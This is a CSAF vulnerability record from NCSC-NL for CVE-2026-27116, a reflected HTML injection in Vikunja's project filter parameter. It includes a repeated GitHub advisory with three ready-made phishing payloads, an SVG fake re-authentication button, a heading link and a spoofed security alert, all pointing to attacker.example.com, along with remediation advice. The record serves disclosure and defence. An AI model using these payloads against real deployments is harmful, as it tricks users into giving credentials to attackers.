{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-27116",
        "tracking": {
            "current_release_date": "2026-03-27T20:40:59.646158Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-27116",
            "initial_release_date": "2026-02-25T21:38:53.902295Z",
            "revision_history": [
                {
                    "date": "2026-02-25T21:38:53.902295Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-02-25T21:38:55.156109Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-02-25T22:25:21.680206Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-02-25T22:25:25.588668Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-02-25T22:39:03.768603Z",
                    "number": "5",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-02-25T22:39:49.408566Z",
                    "number": "6",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (5).| CWES updated (1)."
                },
                {
                    "date": "2026-02-25T22:39:58.373634Z",
                    "number": "7",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-02-26T00:12:46.395721Z",
                    "number": "8",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-02-26T00:12:53.670684Z",
                    "number": "9",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-02-26T11:39:57.376705Z",
                    "number": "10",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (42).| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-02-26T14:14:01.286011Z",
                    "number": "11",
                    "summary": "Source created.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-02-26T14:14:05.579343Z",
                    "number": "12",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-02-27T22:39:41.626392Z",
                    "number": "13",
                    "summary": "References created (2)."
                },
                {
                    "date": "2026-02-28T06:12:49.847549Z",
                    "number": "14",
                    "summary": "References created (2)."
                },
                {
                    "date": "2026-03-05T17:24:45.321442Z",
                    "number": "15",
                    "summary": "Products created (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-05T17:24:48.788393Z",
                    "number": "16",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-09T06:12:45.874208Z",
                    "number": "17",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (3)."
                },
                {
                    "date": "2026-03-09T06:12:49.884734Z",
                    "number": "18",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T09:42:33.149753Z",
                    "number": "19",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-20T09:42:35.977514Z",
                    "number": "20",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-27T19:49:18.844048Z",
                    "number": "21",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (8).| CWES updated (1)."
                },
                {
                    "date": "2026-03-27T19:49:21.468679Z",
                    "number": "22",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "22"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<=0.24.6",
                                "product": {
                                    "name": "vers:unknown/>=0|<=0.24.6",
                                    "product_id": "CSAFPID-5597060"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "api"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.21.0",
                                "product": {
                                    "name": "vers:unknown/0.21.0",
                                    "product_id": "CSAFPID-5602633"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.0.0",
                                "product": {
                                    "name": "vers:unknown/<2.0.0",
                                    "product_id": "CSAFPID-5712844"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.1",
                                "product": {
                                    "name": "vers:unknown/v0.1",
                                    "product_id": "CSAFPID-5602634"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.10",
                                "product": {
                                    "name": "vers:unknown/v0.10",
                                    "product_id": "CSAFPID-5602635"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.11",
                                "product": {
                                    "name": "vers:unknown/v0.11",
                                    "product_id": "CSAFPID-5602636"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.12",
                                "product": {
                                    "name": "vers:unknown/v0.12",
                                    "product_id": "CSAFPID-5602637"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.13",
                                "product": {
                                    "name": "vers:unknown/v0.13",
                                    "product_id": "CSAFPID-5602638"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.13.1",
                                "product": {
                                    "name": "vers:unknown/v0.13.1",
                                    "product_id": "CSAFPID-5602639"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.14.0",
                                "product": {
                                    "name": "vers:unknown/v0.14.0",
                                    "product_id": "CSAFPID-5602640"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.15.0",
                                "product": {
                                    "name": "vers:unknown/v0.15.0",
                                    "product_id": "CSAFPID-5602641"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.16.0",
                                "product": {
                                    "name": "vers:unknown/v0.16.0",
                                    "product_id": "CSAFPID-5602642"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.17.0",
                                "product": {
                                    "name": "vers:unknown/v0.17.0",
                                    "product_id": "CSAFPID-5602643"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.18.0",
                                "product": {
                                    "name": "vers:unknown/v0.18.0",
                                    "product_id": "CSAFPID-5602644"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.18.1",
                                "product": {
                                    "name": "vers:unknown/v0.18.1",
                                    "product_id": "CSAFPID-5602645"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.19.0",
                                "product": {
                                    "name": "vers:unknown/v0.19.0",
                                    "product_id": "CSAFPID-5602646"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.19.1",
                                "product": {
                                    "name": "vers:unknown/v0.19.1",
                                    "product_id": "CSAFPID-5602647"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.19.2",
                                "product": {
                                    "name": "vers:unknown/v0.19.2",
                                    "product_id": "CSAFPID-5602648"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.2",
                                "product": {
                                    "name": "vers:unknown/v0.2",
                                    "product_id": "CSAFPID-5602649"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.20.0",
                                "product": {
                                    "name": "vers:unknown/v0.20.0",
                                    "product_id": "CSAFPID-5602650"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.20.1",
                                "product": {
                                    "name": "vers:unknown/v0.20.1",
                                    "product_id": "CSAFPID-5602651"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.20.3",
                                "product": {
                                    "name": "vers:unknown/v0.20.3",
                                    "product_id": "CSAFPID-5602652"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.20.4",
                                "product": {
                                    "name": "vers:unknown/v0.20.4",
                                    "product_id": "CSAFPID-5602653"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.20.5",
                                "product": {
                                    "name": "vers:unknown/v0.20.5",
                                    "product_id": "CSAFPID-5602654"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.21.0",
                                "product": {
                                    "name": "vers:unknown/v0.21.0",
                                    "product_id": "CSAFPID-5602655"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.22.0",
                                "product": {
                                    "name": "vers:unknown/v0.22.0",
                                    "product_id": "CSAFPID-5602656"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.22.1",
                                "product": {
                                    "name": "vers:unknown/v0.22.1",
                                    "product_id": "CSAFPID-5602657"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.23.0",
                                "product": {
                                    "name": "vers:unknown/v0.23.0",
                                    "product_id": "CSAFPID-5602658"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.24.1",
                                "product": {
                                    "name": "vers:unknown/v0.24.1",
                                    "product_id": "CSAFPID-5602659"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.3",
                                "product": {
                                    "name": "vers:unknown/v0.3",
                                    "product_id": "CSAFPID-5602660"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.4",
                                "product": {
                                    "name": "vers:unknown/v0.4",
                                    "product_id": "CSAFPID-5602661"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.5",
                                "product": {
                                    "name": "vers:unknown/v0.5",
                                    "product_id": "CSAFPID-5602662"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.6",
                                "product": {
                                    "name": "vers:unknown/v0.6",
                                    "product_id": "CSAFPID-5602663"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.7",
                                "product": {
                                    "name": "vers:unknown/v0.7",
                                    "product_id": "CSAFPID-5602664"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.8",
                                "product": {
                                    "name": "vers:unknown/v0.8",
                                    "product_id": "CSAFPID-5602665"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.9",
                                "product": {
                                    "name": "vers:unknown/v0.9",
                                    "product_id": "CSAFPID-5602666"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.0.0",
                                "product": {
                                    "name": "vers:unknown/v1.0.0",
                                    "product_id": "CSAFPID-5602667"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.0.0-rc0",
                                "product": {
                                    "name": "vers:unknown/v1.0.0-rc0",
                                    "product_id": "CSAFPID-5602668"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.0.0-rc1",
                                "product": {
                                    "name": "vers:unknown/v1.0.0-rc1",
                                    "product_id": "CSAFPID-5602669"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.0.0-rc2",
                                "product": {
                                    "name": "vers:unknown/v1.0.0-rc2",
                                    "product_id": "CSAFPID-5602670"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.0.0-rc3",
                                "product": {
                                    "name": "vers:unknown/v1.0.0-rc3",
                                    "product_id": "CSAFPID-5602671"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.0.0-rc4",
                                "product": {
                                    "name": "vers:unknown/v1.0.0-rc4",
                                    "product_id": "CSAFPID-5602672"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.1.0",
                                "product": {
                                    "name": "vers:unknown/v1.1.0",
                                    "product_id": "CSAFPID-5727729"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/vue3",
                                "product": {
                                    "name": "vers:unknown/vue3",
                                    "product_id": "CSAFPID-5602673"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "vikunja"
                    }
                ],
                "category": "vendor",
                "name": "go-vikunja"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<=0.24.6",
                                "product": {
                                    "name": "vers:unknown/<=0.24.6",
                                    "product_id": "CSAFPID-5847612"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "go/code.vikunja.io/api"
                    }
                ],
                "category": "vendor",
                "name": "code.vikunja.io"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.0.0",
                                "product": {
                                    "name": "vers:unknown/<2.0.0",
                                    "product_id": "CSAFPID-5763289",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "vikunja"
                    }
                ],
                "category": "vendor",
                "name": "vikunja"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-27116",
            "cwe": {
                "id": "CWE-79",
                "name": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.0.0, a reflected HTML injection vulnerability exists in the Projects module where the `filter` URL parameter is rendered into the DOM without output encoding when the user clicks \"Filter.\" While `<script>` and `<iframe>` are blocked, `<svg>`, `<a>`, and formatting tags (`<h1>`, `<b>`, `<u>`) render without restriction — enabling SVG-based phishing buttons, external redirect links, and content spoofing within the trusted application origin. Version 2.0.0 fixes this issue.",
                    "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-27116"
                },
                {
                    "category": "description",
                    "text": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.0.0, a reflected HTML injection vulnerability exists in the Projects module where the `filter` URL parameter is rendered into the DOM without output encoding when the user clicks \"Filter.\" While `<script>` and `<iframe>` are blocked, `<svg>`, `<a>`, and formatting tags (`<h1>`, `<b>`, `<u>`) render without restriction — enabling SVG-based phishing buttons, external redirect links, and content spoofing within the trusted application origin. Version 2.0.0 fixes this issue.",
                    "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-27116"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\n[Vikunja](https://github.com/go-vikunja/vikunja) is an open-source self-hosted task management platform with 3,300+ GitHub stars. A reflected HTML injection vulnerability exists in the Projects module where the `filter` URL parameter is rendered into the DOM without output encoding when the user clicks \"Filter.\" While `<script>` and `<iframe>` are blocked, `<svg>`, `<a>`, and formatting tags (`<h1>`, `<b>`, `<u>`) render without restriction — enabling SVG-based phishing buttons, external redirect links, and content spoofing within the trusted application origin.\n\n**Attack flow:** Attacker shares a crafted project filter link (routine Vikunja workflow) → victim opens it → victim clicks \"Filter\" (standard UI action) → phishing content renders inside trusted Vikunja interface.\n\n## Affected Component\n\n| Field | Detail |\n|---|---|\n| Application | Vikunja v1.1.0 |\n| Module | Projects |\n| Endpoint | `/projects/-1/-1?filter=PAYLOAD&page=1` |\n| Parameter | `filter` (GET) |\n| Trigger | Click \"Filter\" button |\n| Stack | Go backend, Vue.js + TypeScript frontend |\n| Blocked | `<script>`, `<iframe>` |\n| Allowed | `<svg>`, `<a>`, `<rect>`, `<text>`, `<h1>`, `<b>`, `<u>` |\n\n## Proof-of-Concept\n\n### PoC-1: SVG Phishing Button (Highest Impact)\n\nRenders a styled, clickable red button redirecting to attacker domain. 
Visually indistinguishable from a real UI button.\n\n```\nhttp://localhost:3456/projects/-1/-1?filter=%3Csvg%20width%3D%22400%22%20height%3D%2260%22%3E%3Ca%20href%3D%22https%3A%2F%2Fattacker.example.com%2Flogin%22%3E%3Crect%20width%3D%22400%22%20height%3D%2260%22%20rx%3D%224%22%20fill%3D%22%23d32f2f%22%3E%3C%2Frect%3E%3Ctext%20x%3D%22200%22%20y%3D%2237%22%20text-anchor%3D%22middle%22%20fill%3D%22white%22%20font-size%3D%2216%22%3ESession%20Expired%20-%20Click%20to%20Re-authenticate%3C%2Ftext%3E%3C%2Fa%3E%3C%2Fsvg%3E&page=1\n```\n\nRaw payload:\n```html\n<svg width=\"400\" height=\"60\"><a href=\"https://attacker.example.com/login\"><rect width=\"400\" height=\"60\" rx=\"4\" fill=\"#d32f2f\"></rect><text x=\"200\" y=\"37\" text-anchor=\"middle\" fill=\"white\" font-size=\"16\">Session Expired - Click to Re-authenticate</text></a></svg>\n```\n\n### PoC-2: Phishing Link via Heading + Anchor\n\nProminent clickable link styled as urgent system message.\n\n```\nhttp://localhost:3456/projects/-1/-1?filter=%3Ch1%3E%3Ca%20href%3D%22https%3A%2F%2Fattacker.example.com%2Flogin%22%3E%E2%9A%A0%20Your%20session%20has%20expired.%20Click%20here%20to%20sign%20in%20again.%3C%2Fa%3E%3C%2Fh1%3E&page=1\n```\n\nRaw payload:\n```html\n<h1><a href=\"https://attacker.example.com/login\">⚠ Your session has expired. 
Click here to sign in again.</a></h1>\n```\n\n### PoC-3: Content Spoofing — Fake Security Alert\n\nFake security warning directing victim to attacker-controlled contact.\n\n```\nhttp://localhost:3456/projects/-1/-1?filter=%3Ch1%3E%3Cu%3E%3Cb%3E%E2%9A%A0%20SECURITY%20ALERT%3C%2Fb%3E%3C%2Fu%3E%3C%2Fh1%3E%3Cb%3EUnauthorized%20access%20detected%20on%20your%20account.%20Your%20account%20will%20be%20suspended%20in%2024%20hours.%20Contact%20IT%20security%20immediately%20at%20security%40attacker.example.com%20or%20visit%20https%3A%2F%2Fattacker.example.com%2Fverify%20to%20confirm%20your%20identity.%3C%2Fb%3E&page=1\n```\n\nRaw payload:\n```html\n<h1><u><b>⚠ SECURITY ALERT</b></u></h1><b>Unauthorized access detected on your account. Your account will be suspended in 24 hours. Contact IT security immediately at security@attacker.example.com or visit https://attacker.example.com/verify to confirm your identity.</b>\n```\n\n## Root Cause\n\nThe `filter` parameter is inserted into the DOM as raw HTML — likely via Vue.js `v-html` or `innerHTML`. A partial denylist strips `<script>` and `<iframe>` but does not encode output or filter SVG/anchor/formatting elements. No allowlist, no output encoding, no input syntax validation exists.\n\n## Impact\n\n| Impact | Description |\n|---|---|\n| SVG Phishing Buttons | Pixel-perfect fake buttons redirect to credential harvesting pages |\n| External Redirect | Anchor tags point to attacker domains from within trusted origin |\n| Content Spoofing | Fake alerts manipulate users into contacting attacker channels |\n| Self-Hosted Risk | Compromised credentials may grant access to internal infrastructure |\n| API Access | Same credentials grant full REST API access for data exfiltration |\n| No Logging | GET-based reflected injection leaves no distinguishable server logs |\n\n**Not Self-XSS:** Payload is attacker-controlled via URL, delivered through routine link sharing, triggered by standard UI interaction. 
The victim makes no security-relevant decision.\n\n## CWE & CVSS\n\n**CWE-79** (Primary) — Improper Neutralization of Input During Web Page Generation\n\n**CWE-80** (Secondary) — Improper Neutralization of Script-Related HTML Tags\n\n**CVSS 3.1:** `AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` — **6.1 (Medium)**\n\nScore understates risk because: user interactions are routine workflow (not security decisions), SVG enables pixel-perfect UI spoofing, self-hosted deployments expose internal infrastructure, and API credential equivalence enables automated data exfiltration.\n\n## Remediation\n\n| Priority | Action |\n|---|---|\n| P0 | Replace `v-html` with `v-text` or `{{ }}` interpolation (auto-escapes HTML) |\n| P0 | HTML entity encode the `filter` value at rendering point |\n| P1 | Replace denylist with DOMPurify strict allowlist or eliminate HTML rendering of filter values |\n| P1 | Deploy CSP with `form-action 'self'` (note: `form-action` only restricts form submissions; it does not block `<a href>` navigation, so it is a defense-in-depth measure rather than a fix for the anchor-based PoCs) |\n| P2 | Server-side input validation — reject filter values not matching expected syntax |\n\n## References\n\n- Vikunja Repository: https://github.com/go-vikunja/vikunja\n- CWE-79: https://cwe.mitre.org/data/definitions/79.html\n- CWE-80: https://cwe.mitre.org/data/definitions/80.html\n- OWASP XSS Prevention: https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Scripting_Prevention_Cheat_Sheet.html\n\n## Conclusion\n\nThe `filter` parameter in Vikunja's Projects module renders unsanitized HTML into the DOM, enabling SVG-based phishing buttons, external redirect links, and content spoofing within the trusted application origin. The attack requires only routine workflow actions — opening a shared link and clicking \"Filter.\" The fix is a single-line change: replacing `v-html` with `v-text` in the Vue.js rendering logic. 
Given Vikunja's adoption (3,300+ stars), self-hosted deployment model, and API credential equivalence, this warrants prompt remediation.\n\n<img width=\"1920\" height=\"1020\" alt=\"image\" src=\"https://github.com/user-attachments/assets/007f9b1a-fd20-4fe8-84e5-1bf886a5a7a9\" />\n\nA fix is available at https://github.com/go-vikunja/vikunja/releases/tag/v2.0.0.",
                    "title": "github - https://github.com/advisories/GHSA-4qgr-4h56-8895"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\n[Vikunja](https://github.com/go-vikunja/vikunja) is an open-source self-hosted task management platform with 3,300+ GitHub stars. A reflected HTML injection vulnerability exists in the Projects module where the `filter` URL parameter is rendered into the DOM without output encoding when the user clicks \"Filter.\" While `<script>` and `<iframe>` are blocked, `<svg>`, `<a>`, and formatting tags (`<h1>`, `<b>`, `<u>`) render without restriction — enabling SVG-based phishing buttons, external redirect links, and content spoofing within the trusted application origin.\n\n**Attack flow:** Attacker shares a crafted project filter link (routine Vikunja workflow) → victim opens it → victim clicks \"Filter\" (standard UI action) → phishing content renders inside trusted Vikunja interface.\n\n## Affected Component\n\n| Field | Detail |\n|---|---|\n| Application | Vikunja v1.1.0 |\n| Module | Projects |\n| Endpoint | `/projects/-1/-1?filter=PAYLOAD&page=1` |\n| Parameter | `filter` (GET) |\n| Trigger | Click \"Filter\" button |\n| Stack | Go backend, Vue.js + TypeScript frontend |\n| Blocked | `<script>`, `<iframe>` |\n| Allowed | `<svg>`, `<a>`, `<rect>`, `<text>`, `<h1>`, `<b>`, `<u>` |\n\n## Proof-of-Concept\n\n### PoC-1: SVG Phishing Button (Highest Impact)\n\nRenders a styled, clickable red button redirecting to attacker domain. 
Visually indistinguishable from a real UI button.\n\n```\nhttp://localhost:3456/projects/-1/-1?filter=%3Csvg%20width%3D%22400%22%20height%3D%2260%22%3E%3Ca%20href%3D%22https%3A%2F%2Fattacker.example.com%2Flogin%22%3E%3Crect%20width%3D%22400%22%20height%3D%2260%22%20rx%3D%224%22%20fill%3D%22%23d32f2f%22%3E%3C%2Frect%3E%3Ctext%20x%3D%22200%22%20y%3D%2237%22%20text-anchor%3D%22middle%22%20fill%3D%22white%22%20font-size%3D%2216%22%3ESession%20Expired%20-%20Click%20to%20Re-authenticate%3C%2Ftext%3E%3C%2Fa%3E%3C%2Fsvg%3E&page=1\n```\n\nRaw payload:\n```html\n<svg width=\"400\" height=\"60\"><a href=\"https://attacker.example.com/login\"><rect width=\"400\" height=\"60\" rx=\"4\" fill=\"#d32f2f\"></rect><text x=\"200\" y=\"37\" text-anchor=\"middle\" fill=\"white\" font-size=\"16\">Session Expired - Click to Re-authenticate</text></a></svg>\n```\n\n### PoC-2: Phishing Link via Heading + Anchor\n\nProminent clickable link styled as urgent system message.\n\n```\nhttp://localhost:3456/projects/-1/-1?filter=%3Ch1%3E%3Ca%20href%3D%22https%3A%2F%2Fattacker.example.com%2Flogin%22%3E%E2%9A%A0%20Your%20session%20has%20expired.%20Click%20here%20to%20sign%20in%20again.%3C%2Fa%3E%3C%2Fh1%3E&page=1\n```\n\nRaw payload:\n```html\n<h1><a href=\"https://attacker.example.com/login\">⚠ Your session has expired. 
Click here to sign in again.</a></h1>\n```\n\n### PoC-3: Content Spoofing — Fake Security Alert\n\nFake security warning directing victim to attacker-controlled contact.\n\n```\nhttp://localhost:3456/projects/-1/-1?filter=%3Ch1%3E%3Cu%3E%3Cb%3E%E2%9A%A0%20SECURITY%20ALERT%3C%2Fb%3E%3C%2Fu%3E%3C%2Fh1%3E%3Cb%3EUnauthorized%20access%20detected%20on%20your%20account.%20Your%20account%20will%20be%20suspended%20in%2024%20hours.%20Contact%20IT%20security%20immediately%20at%20security%40attacker.example.com%20or%20visit%20https%3A%2F%2Fattacker.example.com%2Fverify%20to%20confirm%20your%20identity.%3C%2Fb%3E&page=1\n```\n\nRaw payload:\n```html\n<h1><u><b>⚠ SECURITY ALERT</b></u></h1><b>Unauthorized access detected on your account. Your account will be suspended in 24 hours. Contact IT security immediately at security@attacker.example.com or visit https://attacker.example.com/verify to confirm your identity.</b>\n```\n\n## Root Cause\n\nThe `filter` parameter is inserted into the DOM as raw HTML — likely via Vue.js `v-html` or `innerHTML`. A partial denylist strips `<script>` and `<iframe>` but does not encode output or filter SVG/anchor/formatting elements. No allowlist, no output encoding, no input syntax validation exists.\n\n## Impact\n\n| Impact | Description |\n|---|---|\n| SVG Phishing Buttons | Pixel-perfect fake buttons redirect to credential harvesting pages |\n| External Redirect | Anchor tags point to attacker domains from within trusted origin |\n| Content Spoofing | Fake alerts manipulate users into contacting attacker channels |\n| Self-Hosted Risk | Compromised credentials may grant access to internal infrastructure |\n| API Access | Same credentials grant full REST API access for data exfiltration |\n| No Logging | GET-based reflected injection leaves no distinguishable server logs |\n\n**Not Self-XSS:** Payload is attacker-controlled via URL, delivered through routine link sharing, triggered by standard UI interaction. 
The victim makes no security-relevant decision.\n\n## CWE & CVSS\n\n**CWE-79** (Primary) — Improper Neutralization of Input During Web Page Generation\n\n**CWE-80** (Secondary) — Improper Neutralization of Script-Related HTML Tags\n\n**CVSS 3.1:** `AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` — **6.1 (Medium)**\n\nScore understates risk because: user interactions are routine workflow (not security decisions), SVG enables pixel-perfect UI spoofing, self-hosted deployments expose internal infrastructure, and API credential equivalence enables automated data exfiltration.\n\n## Remediation\n\n| Priority | Action |\n|---|---|\n| P0 | Replace `v-html` with `v-text` or `{{ }}` interpolation (auto-escapes HTML) |\n| P0 | HTML entity encode the `filter` value at rendering point |\n| P1 | Replace denylist with DOMPurify strict allowlist or eliminate HTML rendering of filter values |\n| P1 | Deploy CSP with `form-action 'self'` (note: `form-action` only restricts form submissions; it does not block `<a href>` navigation, so it is a defense-in-depth measure rather than a fix for the anchor-based PoCs) |\n| P2 | Server-side input validation — reject filter values not matching expected syntax |\n\n## References\n\n- Vikunja Repository: https://github.com/go-vikunja/vikunja\n- CWE-79: https://cwe.mitre.org/data/definitions/79.html\n- CWE-80: https://cwe.mitre.org/data/definitions/80.html\n- OWASP XSS Prevention: https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Scripting_Prevention_Cheat_Sheet.html\n\n## Conclusion\n\nThe `filter` parameter in Vikunja's Projects module renders unsanitized HTML into the DOM, enabling SVG-based phishing buttons, external redirect links, and content spoofing within the trusted application origin. The attack requires only routine workflow actions — opening a shared link and clicking \"Filter.\" The fix is a single-line change: replacing `v-html` with `v-text` in the Vue.js rendering logic. 
Given Vikunja's adoption (3,300+ stars), self-hosted deployment model, and API credential equivalence, this warrants prompt remediation.\n\n<img width=\"1920\" height=\"1020\" alt=\"image\" src=\"https://github.com/user-attachments/assets/007f9b1a-fd20-4fe8-84e5-1bf886a5a7a9\" />\n\nA fix is available at https://github.com/go-vikunja/vikunja/releases/tag/v2.0.0.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-4qgr-4h56-8895.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.0.0, a reflected HTML injection vulnerability exists in the Projects module where the `filter` URL parameter is rendered into the DOM without output encoding when the user clicks \"Filter.\" While `<script>` and `<iframe>` are blocked, `<svg>`, `<a>`, and formatting tags (`<h1>`, `<b>`, `<u>`) render without restriction — enabling SVG-based phishing buttons, external redirect links, and content spoofing within the trusted application origin. Version 2.0.0 fixes this issue.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-27116.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "Vikunja has Reflected HTML Injection via filter Parameter in its Projects Module in code.vikunja.io/api",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4552.json?alt=media"
                },
                {
                    "category": "description",
